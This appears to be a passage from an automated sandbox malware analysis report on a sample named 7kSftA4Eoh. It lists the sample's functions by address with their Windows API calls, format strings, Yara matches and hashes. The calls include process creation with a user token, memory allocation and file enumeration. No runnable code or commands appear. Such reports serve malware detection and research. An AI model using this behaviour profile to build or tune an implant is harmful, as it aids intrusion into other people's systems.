                                                                  • Opcode ID: f5e95f1cec49cb8295e8910afdc9cd69a30e00266090bda7aefa62782977679d
                                                                  • Instruction ID: 3180c2470e8bd3ded293f072d1eb4c53dd061eb4762ffc4787bcce6c50f8afca
                                                                  • Opcode Fuzzy Hash: f5e95f1cec49cb8295e8910afdc9cd69a30e00266090bda7aefa62782977679d
                                                                  • Instruction Fuzzy Hash: B7F05C2134C6461FE71595EDAC61BF606CED799320F28115BE41CC7392E954CC83C765
                                                                  Function 00403040 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 004017F8: malloc.MSVCRT ref: 004017B9
                                                                    • Part of subcall function 004017F8: SleepEx.KERNELBASE ref: 004017CD
                                                                    • Part of subcall function 004017F8: GetTickCount.KERNEL32 ref: 004017FC
                                                                    • Part of subcall function 004017F8: CreateThread.KERNEL32 ref: 00401885
                                                                  • SleepEx.KERNELBASE(?,?,?,004013B4), ref: 0040305D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4125858105.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.4125823781.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125902897.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125926800.0000000000405000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4125980244.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_7kSftA4Eoh.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep$CountCreateThreadTickmalloc
                                                                  • String ID:
                                                                  • API String ID: 345437100-0
                                                                  • Opcode ID: b6d36b54cf31cf0f426623e933f06735054b4a30bed8d9593c1a6858c86775c1
                                                                  • Instruction ID: 8364c3e29ff4e62ba415e97045e67fc6fb748e7a580f304519b0ce082c56ecd4
                                                                  • Opcode Fuzzy Hash: b6d36b54cf31cf0f426623e933f06735054b4a30bed8d9593c1a6858c86775c1
                                                                  • Instruction Fuzzy Hash: B4C022A030208880EF08B3B280AB32E0A080B08388F0C083FEF0B322E28C3CC000030E
                                                                  Function 03557853 Relevance: 1.4, APIs: 1, Instructions: 136memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: 614a4b05fd2fcf958961d58200ae62ff8fa006310eb0dba3dbba10185b0029ad
                                                                  • Instruction ID: 910d0dca86248ee6b61208585bf847d44137a7cfffe4cf3b4d725d9636107594
                                                                  • Opcode Fuzzy Hash: 614a4b05fd2fcf958961d58200ae62ff8fa006310eb0dba3dbba10185b0029ad
                                                                  • Instruction Fuzzy Hash: 4F418670618B489FD784EB2CD498B2AB7E1FB9C355F44096EF889C7260D734E881CB42

                                                                  Non-executed Functions

                                                                  Function 009A6C98 Relevance: 64.0, APIs: 32, Strings: 4, Instructions: 969COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: htonl$ErrorLastOpenProcess
                                                                  • String ID: %s%d%d%s%s%d$%s%d%d$x64$x86
                                                                  • API String ID: 3543785021-1833344708
                                                                  • Opcode ID: c8c97dfc55eba45ef1c6c6993464718e573ee33c36903e71c3618c37d8cddb68
                                                                  • Instruction ID: e0f8f59152eabed40ff82067fb98a79ae2766deee115dd8553f4c4d35461fca8
                                                                  • Opcode Fuzzy Hash: c8c97dfc55eba45ef1c6c6993464718e573ee33c36903e71c3618c37d8cddb68
                                                                  • Instruction Fuzzy Hash: B6624721B1964082DF18DB6AAC553B962D5F7CBB80FA44525ED0E43B5AEF3CC9428BC0
                                                                  Function 009B22B4 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 460COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: __doserrno_errno_invalid_parameter_noinfo
                                                                  • String ID: U
                                                                  • API String ID: 3902385426-4171548499
                                                                  • Opcode ID: 887be5ca941d1e1bbf8005ee108c45f4cc0021591f9d338be499f64fbdbfcab3
                                                                  • Instruction ID: c1613d58f900eca73b4ef37bd1d1c812bcf31d3e55e96d4359860f8606f80d17
                                                                  • Opcode Fuzzy Hash: 887be5ca941d1e1bbf8005ee108c45f4cc0021591f9d338be499f64fbdbfcab3
                                                                  • Instruction Fuzzy Hash: 0102153331468586DB20CF28E6843EEB765F789BA8F500516EB8E47B69DB3DC945CB10
                                                                  Function 009AED3C Relevance: 37.4, APIs: 19, Strings: 2, Instructions: 694COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 009AED9D
                                                                    • Part of subcall function 009AE220: _getptd.LIBCMT ref: 009AE236
                                                                    • Part of subcall function 009AE220: __updatetlocinfo.LIBCMT ref: 009AE26B
                                                                    • Part of subcall function 009AE220: __updatetmbcinfo.LIBCMT ref: 009AE292
                                                                  • _errno.LIBCMT ref: 009AEDA2
                                                                    • Part of subcall function 009ADA10: _getptd_noexit.LIBCMT ref: 009ADA14
                                                                  • _fileno.LIBCMT ref: 009AEDCF
                                                                    • Part of subcall function 009B17F4: _errno.LIBCMT ref: 009B17FD
                                                                    • Part of subcall function 009B17F4: _invalid_parameter_noinfo.LIBCMT ref: 009B1808
                                                                  • write_multi_char.LIBCMT ref: 009AF40B
                                                                  • write_string.LIBCMT ref: 009AF428
                                                                  • write_multi_char.LIBCMT ref: 009AF445
                                                                  • write_string.LIBCMT ref: 009AF4A4
                                                                  • write_string.LIBCMT ref: 009AF4DB
                                                                  • write_multi_char.LIBCMT ref: 009AF4FD
                                                                  • free.LIBCMT ref: 009AF511
                                                                  • _isleadbyte_l.LIBCMT ref: 009AF5E2
                                                                  • write_char.LIBCMT ref: 009AF5F8
                                                                  • write_char.LIBCMT ref: 009AF619
                                                                  • _errno.LIBCMT ref: 009AF71C
                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 009AF727
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                                                                  • String ID: $@
                                                                  • API String ID: 3318157856-1077428164
                                                                  • Opcode ID: f8df11205d73aff79168b207964888485222e3fd07834b4b3d544df7ad576b6c
                                                                  • Instruction ID: 94a0a0093c9a9047545fdcb02aa2adcc2946b9229083004a78f620b503627b17
                                                                  • Opcode Fuzzy Hash: f8df11205d73aff79168b207964888485222e3fd07834b4b3d544df7ad576b6c
                                                                  • Instruction Fuzzy Hash: 6242483360869486EB24CF99D5643BE7BA8FB43794F241126EE4647A68DB3CC941CBC0
                                                                  Function 009AE2C8 Relevance: 35.7, APIs: 19, Strings: 1, Instructions: 687COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 009AE329
                                                                    • Part of subcall function 009AE220: _getptd.LIBCMT ref: 009AE236
                                                                    • Part of subcall function 009AE220: __updatetlocinfo.LIBCMT ref: 009AE26B
                                                                    • Part of subcall function 009AE220: __updatetmbcinfo.LIBCMT ref: 009AE292
                                                                  • _errno.LIBCMT ref: 009AE32E
                                                                    • Part of subcall function 009ADA10: _getptd_noexit.LIBCMT ref: 009ADA14
                                                                  • _fileno.LIBCMT ref: 009AE35B
                                                                    • Part of subcall function 009B17F4: _errno.LIBCMT ref: 009B17FD
                                                                    • Part of subcall function 009B17F4: _invalid_parameter_noinfo.LIBCMT ref: 009B1808
                                                                  • write_multi_char.LIBCMT ref: 009AE98B
                                                                  • write_string.LIBCMT ref: 009AE9A8
                                                                  • write_multi_char.LIBCMT ref: 009AE9C5
                                                                  • write_string.LIBCMT ref: 009AEA24
                                                                  • write_string.LIBCMT ref: 009AEA5B
                                                                  • write_multi_char.LIBCMT ref: 009AEA7D
                                                                  • free.LIBCMT ref: 009AEA91
                                                                  • _isleadbyte_l.LIBCMT ref: 009AEB62
                                                                  • write_char.LIBCMT ref: 009AEB78
                                                                  • write_char.LIBCMT ref: 009AEB99
                                                                  • _errno.LIBCMT ref: 009AEC93
                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 009AEC9E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errnowrite_multi_charwrite_string$Locale_invalid_parameter_noinfowrite_char$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                                                                  • String ID:
                                                                  • API String ID: 3318157856-3916222277
                                                                  • Opcode ID: d2d0f6ff9d7b7a13e2b96cc577a047d14fe130a0d0a9348c75ce4f8fc2679a4f
                                                                  • Instruction ID: 4e41af36b0e4ac7dbad4b4bceefa8274fbe6c990517b2962014cbbbca6335b4d
                                                                  • Opcode Fuzzy Hash: d2d0f6ff9d7b7a13e2b96cc577a047d14fe130a0d0a9348c75ce4f8fc2679a4f
                                                                  • Instruction Fuzzy Hash: B332147260879486EF25CF19D5483BE7BB9F783B94F141416EE4A47AA8DB7CC940CB80
                                                                  Function 0355E183 Relevance: 32.5, APIs: 16, Strings: 2, Instructions: 1030COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0355E1E4
                                                                    • Part of subcall function 0355D667: _getptd.LIBCMT ref: 0355D67D
                                                                    • Part of subcall function 0355D667: __updatetlocinfo.LIBCMT ref: 0355D6B2
                                                                    • Part of subcall function 0355D667: __updatetmbcinfo.LIBCMT ref: 0355D6D9
                                                                  • _errno.LIBCMT ref: 0355E1E9
                                                                    • Part of subcall function 0355CE57: _getptd_noexit.LIBCMT ref: 0355CE5B
                                                                  • _fileno.LIBCMT ref: 0355E216
                                                                    • Part of subcall function 03560C3B: _errno.LIBCMT ref: 03560C44
                                                                    • Part of subcall function 03560C3B: _invalid_parameter_noinfo.LIBCMT ref: 03560C4F
                                                                  • write_multi_char.LIBCMT ref: 0355E852
                                                                  • write_string.LIBCMT ref: 0355E86F
                                                                  • write_multi_char.LIBCMT ref: 0355E88C
                                                                  • write_string.LIBCMT ref: 0355E8EB
                                                                  • write_multi_char.LIBCMT ref: 0355E944
                                                                  • free.LIBCMT ref: 0355E958
                                                                  • _isleadbyte_l.LIBCMT ref: 0355EA29
                                                                  • write_char.LIBCMT ref: 0355EA3F
                                                                  • write_char.LIBCMT ref: 0355EA60
                                                                  • _errno.LIBCMT ref: 0355EB63
                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0355EB6E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errnowrite_multi_char$Locale_invalid_parameter_noinfowrite_charwrite_string$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                                                                  • String ID: $@
                                                                  • API String ID: 2950348734-1077428164
                                                                  • Opcode ID: 07341e3732a2750f25fb6a453c6349766dbff6c117d6dfe3209b03da8e3e77c7
                                                                  • Instruction ID: 4c1ec9f2ee031a568fc25aed4152c2b794d65ece9174f9dc623e40e23dfbcf3a
                                                                  • Opcode Fuzzy Hash: 07341e3732a2750f25fb6a453c6349766dbff6c117d6dfe3209b03da8e3e77c7
                                                                  • Instruction Fuzzy Hash: CA52F930918B498ADB2DCB58E4662F9B7E5FB96310F18062FFCC7C7161D734B6028682
                                                                  Function 0355D70F Relevance: 30.8, APIs: 16, Strings: 1, Instructions: 1022COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0355D770
                                                                    • Part of subcall function 0355D667: _getptd.LIBCMT ref: 0355D67D
                                                                    • Part of subcall function 0355D667: __updatetlocinfo.LIBCMT ref: 0355D6B2
                                                                    • Part of subcall function 0355D667: __updatetmbcinfo.LIBCMT ref: 0355D6D9
                                                                  • _errno.LIBCMT ref: 0355D775
                                                                    • Part of subcall function 0355CE57: _getptd_noexit.LIBCMT ref: 0355CE5B
                                                                  • _fileno.LIBCMT ref: 0355D7A2
                                                                    • Part of subcall function 03560C3B: _errno.LIBCMT ref: 03560C44
                                                                    • Part of subcall function 03560C3B: _invalid_parameter_noinfo.LIBCMT ref: 03560C4F
                                                                  • write_multi_char.LIBCMT ref: 0355DDD2
                                                                  • write_string.LIBCMT ref: 0355DDEF
                                                                  • write_multi_char.LIBCMT ref: 0355DE0C
                                                                  • write_string.LIBCMT ref: 0355DE6B
                                                                  • write_multi_char.LIBCMT ref: 0355DEC4
                                                                  • free.LIBCMT ref: 0355DED8
                                                                  • _isleadbyte_l.LIBCMT ref: 0355DFA9
                                                                  • write_char.LIBCMT ref: 0355DFBF
                                                                  • write_char.LIBCMT ref: 0355DFE0
                                                                  • _errno.LIBCMT ref: 0355E0DA
                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0355E0E5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3540000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errnowrite_multi_char$Locale_invalid_parameter_noinfowrite_charwrite_string$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
                                                                  • String ID:
                                                                  • API String ID: 2950348734-3916222277
                                                                  • Opcode ID: 44556820cebba1103ceb5094a228a3c63f1b381211d8945892cc43e8bddeb570
                                                                  • Instruction ID: e63c9b5365ebda20b479dd6505f216d68faaf03fbb5b46570da9b76ef3619083
                                                                  • Opcode Fuzzy Hash: 44556820cebba1103ceb5094a228a3c63f1b381211d8945892cc43e8bddeb570
                                                                  • Instruction Fuzzy Hash: 5952F732918B498BD72CDB5CE4652BAB7F5FB95310F18462FEC87C7271D635B8028642
                                                                  Function 009A61A8 Relevance: 26.0, APIs: 10, Strings: 7, Instructions: 545COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _snprintf.LIBCMT ref: 009A63D6
                                                                  • _snprintf.LIBCMT ref: 009A63F3
                                                                  • _snprintf.LIBCMT ref: 009A6315
                                                                    • Part of subcall function 009AB5DC: _errno.LIBCMT ref: 009AB613
                                                                    • Part of subcall function 009AB5DC: _invalid_parameter_noinfo.LIBCMT ref: 009AB61E
                                                                  • _snprintf.LIBCMT ref: 009A6648
                                                                  • _snprintf.LIBCMT ref: 009A69A4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _snprintf$_errno_invalid_parameter_noinfo
                                                                  • String ID: %s%s$%s%s$%s%s: %s$%s&%s$%s&%s=%s$?%s$?%s=%s
                                                                  • API String ID: 3442832105-1222817042
                                                                  • Opcode ID: 636a98fa85514209f70005b04ca8ead89b4190e8157d1dcb912aa2d8a0183636
                                                                  • Instruction ID: facee8a715216637f8d56909faf2ff4f67f24f2fa9d633588f81edd1b8e74017
                                                                  • Opcode Fuzzy Hash: 636a98fa85514209f70005b04ca8ead89b4190e8157d1dcb912aa2d8a0183636
                                                                  • Instruction Fuzzy Hash: 0D32BC62614E8592EB159F2DE0013E9B3B0FFDA799F045501EF8917B25EF38D2A6C780
                                                                  Function 009A0ED4 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 150filetimeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 009A0F07
                                                                    • Part of subcall function 009AB228: _FF_MSGBANNER.LIBCMT ref: 009AB258
                                                                    • Part of subcall function 009AB228: _NMSG_WRITE.LIBCMT ref: 009AB262
                                                                    • Part of subcall function 009AB228: HeapAlloc.KERNEL32 ref: 009AB27D
                                                                    • Part of subcall function 009AB228: _callnewh.LIBCMT ref: 009AB296
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2A1
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2AC
                                                                    • Part of subcall function 0099CFCC: malloc.LIBCMT ref: 0099CFDF
                                                                    • Part of subcall function 0099CFFC: htonl.WS2_32 ref: 0099D007
                                                                  • GetCurrentDirectoryA.KERNEL32 ref: 009A0F7F
                                                                  • FindFirstFileA.KERNEL32 ref: 009A0FB8
                                                                  • GetLastError.KERNEL32 ref: 009A0FC7
                                                                  • free.LIBCMT ref: 009A1002
                                                                  • free.LIBCMT ref: 009A100F
                                                                    • Part of subcall function 009AB1E8: HeapFree.KERNEL32 ref: 009AB1FE
                                                                    • Part of subcall function 009AB1E8: _errno.LIBCMT ref: 009AB208
                                                                    • Part of subcall function 009AB1E8: GetLastError.KERNEL32 ref: 009AB210
                                                                  • FileTimeToSystemTime.KERNEL32 ref: 009A101C
                                                                  • SystemTimeToTzSpecificLocalTime.KERNEL32 ref: 009A102D
                                                                  • FindNextFileA.KERNEL32 ref: 009A10EA
                                                                  • FindClose.KERNEL32 ref: 009A10FB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Time$FileFind_errno$ErrorHeapLastSystemfreemalloc$AllocCloseCurrentDirectoryFirstFreeLocalNextSpecific_callnewhhtonl
                                                                  • String ID: %s$.\*$D0%02d/%02d/%02d %02d:%02d:%02d%s$F%I64d%02d/%02d/%02d %02d:%02d:%02d%s
                                                                  • API String ID: 723279517-1754256099
                                                                  • Opcode ID: 6ee2af1134a4c9c9c702069b3ed1fb112293960f288e153385e9598e844af32e
                                                                  • Instruction ID: cf4c7814f8bdc95587fb10a2d6d4fe89b829ca06e4dabf30b505146e1bd2a191
                                                                  • Opcode Fuzzy Hash: 6ee2af1134a4c9c9c702069b3ed1fb112293960f288e153385e9598e844af32e
                                                                  • Instruction Fuzzy Hash: E451AB7230879486DB10DF66E8803AEB7A5F7C6B94F504016EE4A43B99EF7CC606CB40
                                                                  Function 009A01E8 Relevance: 18.2, APIs: 12, Instructions: 157processCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateProcessAsUserA.ADVAPI32 ref: 009A0243
                                                                  • GetLastError.KERNEL32 ref: 009A0251
                                                                  • GetLastError.KERNEL32 ref: 009A0275
                                                                    • Part of subcall function 0099F9F4: MultiByteToWideChar.KERNEL32 ref: 0099FA21
                                                                    • Part of subcall function 0099F9F4: MultiByteToWideChar.KERNEL32 ref: 0099FA49
                                                                  • CreateProcessA.KERNEL32 ref: 009A02C7
                                                                  • GetLastError.KERNEL32 ref: 009A02D1
                                                                  • GetCurrentDirectoryW.KERNEL32 ref: 009A0625
                                                                  • GetCurrentDirectoryW.KERNEL32 ref: 009A063F
                                                                  • CreateProcessWithTokenW.ADVAPI32 ref: 009A0683
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateErrorLastProcess$ByteCharCurrentDirectoryMultiWide$TokenUserWith
                                                                  • String ID:
                                                                  • API String ID: 3044875250-0
                                                                  • Opcode ID: b4dadb2b0a0afafdc6fb41f1df9c6971b84a1ac73c104075e8593cd40dbcaad4
                                                                  • Instruction ID: 6e53dc58f6fd4c8fafcdafd9214e88f38d9d6f8359a0955e11516f6e09dae816
                                                                  • Opcode Fuzzy Hash: b4dadb2b0a0afafdc6fb41f1df9c6971b84a1ac73c104075e8593cd40dbcaad4
                                                                  • Instruction Fuzzy Hash: EC61AF32608B44C2EB20DF65E84436E73A9F7C9F98F104526EA4987759DF7CC895CB80
                                                                  Function 009A779C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 87fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • malloc.LIBCMT ref: 009A77CB
                                                                    • Part of subcall function 009AB228: _FF_MSGBANNER.LIBCMT ref: 009AB258
                                                                    • Part of subcall function 009AB228: _NMSG_WRITE.LIBCMT ref: 009AB262
                                                                    • Part of subcall function 009AB228: HeapAlloc.KERNEL32 ref: 009AB27D
                                                                    • Part of subcall function 009AB228: _callnewh.LIBCMT ref: 009AB296
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2A1
                                                                    • Part of subcall function 009AB228: _errno.LIBCMT ref: 009AB2AC
                                                                  • _snprintf.LIBCMT ref: 009A77E3
                                                                    • Part of subcall function 009AB5DC: _errno.LIBCMT ref: 009AB613
                                                                    • Part of subcall function 009AB5DC: _invalid_parameter_noinfo.LIBCMT ref: 009AB61E
                                                                  • FindFirstFileA.KERNEL32 ref: 009A77EE
                                                                  • free.LIBCMT ref: 009A77FA
                                                                    • Part of subcall function 009AB1E8: HeapFree.KERNEL32 ref: 009AB1FE
                                                                    • Part of subcall function 009AB1E8: _errno.LIBCMT ref: 009AB208
                                                                    • Part of subcall function 009AB1E8: GetLastError.KERNEL32 ref: 009AB210
                                                                  • malloc.LIBCMT ref: 009A784A
                                                                  • _snprintf.LIBCMT ref: 009A7862
                                                                  • free.LIBCMT ref: 009A788A
                                                                  • FindNextFileA.KERNEL32 ref: 009A78A3
                                                                  • FindClose.KERNEL32 ref: 009A78B4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.4126095831.00000000009DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_990000_7kSftA4Eoh.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _errno$Find$FileHeap_snprintffreemalloc$AllocCloseErrorFirstFreeLastNext_callnewh_invalid_parameter_noinfo
                                                                  • String ID: %s\*
                                                                  • API String ID: 2620626937-766152087
                                                                  • Opcode ID: 23b6a88991eaeecb41de4e49958cb864f07ba82b9ceb48e7eb1550cb5c125ff7
                                                                  • Instruction ID: 947921e07bb5467ebd1a843e2f383b73829f4cbe01c4e89a8ff1dcdcbb921f7f
                                                                  • Opcode Fuzzy Hash: 23b6a88991eaeecb41de4e49958cb864f07ba82b9ceb48e7eb1550cb5c125ff7
                                                                  • Instruction Fuzzy Hash: 1B3101212082C049EA489BA73D193B9BF29B787FE0F884111DEA90BB56CF3CC402C344
